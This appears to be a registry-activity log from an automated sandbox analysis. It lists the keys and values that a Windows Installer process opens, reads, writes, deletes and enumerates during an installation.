1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\22BEFC8F7E2A1793E9ADB411DEFE1C58 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\4755C4440EB6E323B9DD29F2C6C3A440 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\4755C4440EB6E323B9DD29F2C6C3A440 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4755C4440EB6E323B9DD29F2C6C3A440 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\4EA42A62D9304AC4784BF238120754FF | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\4EA42A62D9304AC4784BF238120754FF | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4EA42A62D9304AC4784BF238120754FF | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\68AB67CA7DA7FFFFB744AA0000000010 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\68AB67CA7DA7FFFFB744AA0000000010 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\68AB67CA7DA7FFFFB744AA0000000010 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\6E815EB96CCE9A53884E7857C57002F0 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\6E815EB96CCE9A53884E7857C57002F0 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\6E815EB96CCE9A53884E7857C57002F0 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\838AE285991981530AC5BD9064F286CE | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\838AE285991981530AC5BD9064F286CE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\838AE285991981530AC5BD9064F286CE | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\C025571B2A687A53689168CD7369889B | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\C025571B2A687A53689168CD7369889B | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\C025571B2A687A53689168CD7369889B | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\DC8A59DBF9D1DA5389A1E3975220E6BB | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\DC8A59DBF9D1DA5389A1E3975220E6BB | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\DC8A59DBF9D1DA5389A1E3975220E6BB | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\F60730A4A66673047777F5728467D401 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\F60730A4A66673047777F5728467D401 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\F60730A4A66673047777F5728467D401 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress | - |
|
5 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\1DB4C8E0922C7994F88F5CFD1713D191 | - |
|
31 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\1DB4C8E0922C7994F88F5CFD1713D191 | - |
|
31 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\1DB4C8E0922C7994F88F5CFD1713D191 | - |
|
31 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1DB4C8E0922C7994F88F5CFD1713D191\InstallProperties | - |
|
5 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
4 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Policies\Microsoft\Windows\Installer | - |
|
7 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\UpgradeCodes\BE14701CF213AA74FBBA8ACB900D664D | - |
|
2 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\UpgradeCodes\BE14701CF213AA74FBBA8ACB900D664D | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\UpgradeCodes\BE14701CF213AA74FBBA8ACB900D664D | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Folders | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = ComSpec, data = %SystemRoot%\system32\cmd.exe, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = FP_NO_HOST_CHECK, data = NO, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = OS, data = Windows_NT, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = Path, data = %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PATHEXT, data = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PROCESSOR_ARCHITECTURE, data = x86, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = TEMP, data = %SystemRoot%\TEMP, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = TMP, data = %SystemRoot%\TEMP, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = USERNAME, data = SYSTEM, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = windir, data = %SystemRoot%, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSModulePath, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = NUMBER_OF_PROCESSORS, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PROCESSOR_LEVEL, data = 6, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PROCESSOR_IDENTIFIER, data = x86 Family 6 Model 79 Stepping 1, GenuineIntel, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PROCESSOR_REVISION, data = 4f01, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = windows_tracing_logfile, data = C:\BVTBin\Tests\installpackage\csilogfile.log, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = windows_tracing_flags, data = 3, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = TEMP, data = %USERPROFILE%\AppData\Local\Temp, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = TMP, data = %USERPROFILE%\AppData\Local\Temp, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109090090400000000000F01FEC | value_name = PackageCode, data = 0927B118E931E524E8A6B60AACAB3AC9, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109090090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109110000000000000000F01FEC | value_name = PackageCode, data = 980AE88F842D69F4C9E27A55306A8649, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109110000000000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091A0090400000000000F01FEC | value_name = PackageCode, data = 4928C45A22B91FA4986D41CC23081555, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091A0090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091E0090400000000000F01FEC | value_name = PackageCode, data = 2FCF40D5DCC775D4A91BC24F0D7AB8E8, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091E0090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051092E0090400000000000F01FEC | value_name = PackageCode, data = 7E7C858808BFF2A41B14022FF95E0D7F, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051092E0090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109440090400000000000F01FEC | value_name = PackageCode, data = 93D8F2F6670C5BF4ABD4C3D6DED2EDA2, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109440090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109510090400000000000F01FEC | value_name = PackageCode, data = FBECD1BD1C0EA774E866E747696AFAC2, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109510090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109511090400000000000F01FEC | value_name = PackageCode, data = 60BB857C7060CA04CB57910F913CAF55, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109511090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109610090400000000000F01FEC | value_name = PackageCode, data = D2785241954CD0B4F800BCA6DE46AF44, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109610090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109711090400000000000F01FEC | value_name = PackageCode, data = CB36B19AC1EB1B44E8CE4FFF74C99B81, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109711090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109810090400000000000F01FEC | value_name = PackageCode, data = CB6E009204B7B774282693A96A5F470E, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109810090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109910090400000000000F01FEC | value_name = PackageCode, data = 245D6987A68AA144FB006EA7110937DB, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109910090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109A10090400000000000F01FEC | value_name = PackageCode, data = A93D262AB5D2F904ABA482C0960B5DF9, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109A10090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109AB0090400000000000F01FEC | value_name = PackageCode, data = 73ED0CB62A06578439742DBE5F71A83B, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109AB0090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B10090400000000000F01FEC | value_name = PackageCode, data = 0243DB7DDF15A52448862C530A09D792, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B10090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B21090400000000000F01FEC | value_name = PackageCode, data = 6FDE5C01A8097CB45B3B666B6B71D105, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B21090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109C20090400000000000F01FEC | value_name = PackageCode, data = BFEC0058DB46BC7428FA09513A1116C7, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109C20090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109E60090400000000000F01FEC | value_name = PackageCode, data = 198868AA08DE2EA4F98E0E97FBA44FE0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109E60090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F10090400000000000F01FEC | value_name = PackageCode, data = 61BE3C81C4614E34387EF11CF92C4102, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F10090400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100A0C00000000000F01FEC | value_name = PackageCode, data = 57A5BD43A2DA8784C9611587E388C5B3, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100A0C00000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100C0400000000000F01FEC | value_name = PackageCode, data = 591A7D07DF2663F4FBA0E7258C089C6D, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100C0400000000000F01FEC | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A | value_name = PackageCode, data = E554C16404AD3B9478B14103C87CECFF, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\21EE4A31AE32173319EEFE3BD6FDFFE3 | value_name = PackageCode, data = 3514399E1BAE6AD4AA27688CBBE1FDC2, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\21EE4A31AE32173319EEFE3BD6FDFFE3 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\2246038675C7F37388062DC64EABA251 | value_name = PackageCode, data = 425DC3227FCF0DE4BB0F0D2788F16225, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\2246038675C7F37388062DC64EABA251 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\22BEFC8F7E2A1793E9ADB411DEFE1C58 | value_name = PackageCode, data = 42DF3075D2FB41D4BAF24E510A63E136, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\22BEFC8F7E2A1793E9ADB411DEFE1C58 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4755C4440EB6E323B9DD29F2C6C3A440 | value_name = PackageCode, data = 3F1CBA45071060E40AA8BCB9C8F5198C, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4755C4440EB6E323B9DD29F2C6C3A440 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4EA42A62D9304AC4784BF238120754FF | value_name = PackageCode, data = 57BB70F73B3FE8242802F7708B9A2F38, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\4EA42A62D9304AC4784BF238120754FF | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\68AB67CA7DA7FFFFB744AA0000000010 | value_name = PackageCode, data = 091E586FC60D5CF4CA046D066347342A, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\68AB67CA7DA7FFFFB744AA0000000010 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\6E815EB96CCE9A53884E7857C57002F0 | value_name = PackageCode, data = B4E370007AE0BD84C914DF7A9EBB8493, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\6E815EB96CCE9A53884E7857C57002F0 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\838AE285991981530AC5BD9064F286CE | value_name = PackageCode, data = B2DC948BACE96054AB7F12ABB351578E, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\838AE285991981530AC5BD9064F286CE | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\C025571B2A687A53689168CD7369889B | value_name = PackageCode, data = C21C44A45E1638843A5DBCB198CD0247, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\C025571B2A687A53689168CD7369889B | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | value_name = PackageCode, data = 84067013B7B56744BA0F51892982BC09, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\DC8A59DBF9D1DA5389A1E3975220E6BB | value_name = PackageCode, data = 3EB83B319B95F3645B773BEF173ADAA3, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\DC8A59DBF9D1DA5389A1E3975220E6BB | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\F60730A4A66673047777F5728467D401 | value_name = PackageCode, data = 0B95A7D38B9F344439144DA5D002FE78, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\F60730A4A66673047777F5728467D401 | value_name = InstanceType, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoDrives, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager | value_name = PendingFileRenameOperations, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = ProgramFilesDir, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = CommonFilesDir, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion | value_name = RegisteredOwner, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = RegisteredOwner, data = HOeZ8a2NshU Z3koIp3I sO1V776, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion | value_name = RegisteredOrganization, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = RegisteredOrganization, data = fjNg4aI f6Gj4Cw7B BmiWRhfNHo, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Folders | data = C:\Windows\Installer\a6cfff.ipi, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = ScreenSaverIsSecure, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress | data = C:\Windows\Installer\a6cfff.ipi, size = 64, type = REG_SZ |
|
1 | |
| Write Value | - | value_name = C:\Config.Msi\a6d000.rbs, data = 30716291, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | - | value_name = C:\Config.Msi\a6d000.rbsLow, data = 2682570864, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts\Scripts | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts\Rollback | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress | - |
|
1 | |
| Delete Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | value_name = C:\Config.Msi\a6d000.rbs |
|
1 | |
| Delete Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | value_name = C:\Config.Msi\a6d000.rbsLow |
|
1 | |
| Delete Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Folders | value_name = C:\Config.Msi\ |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
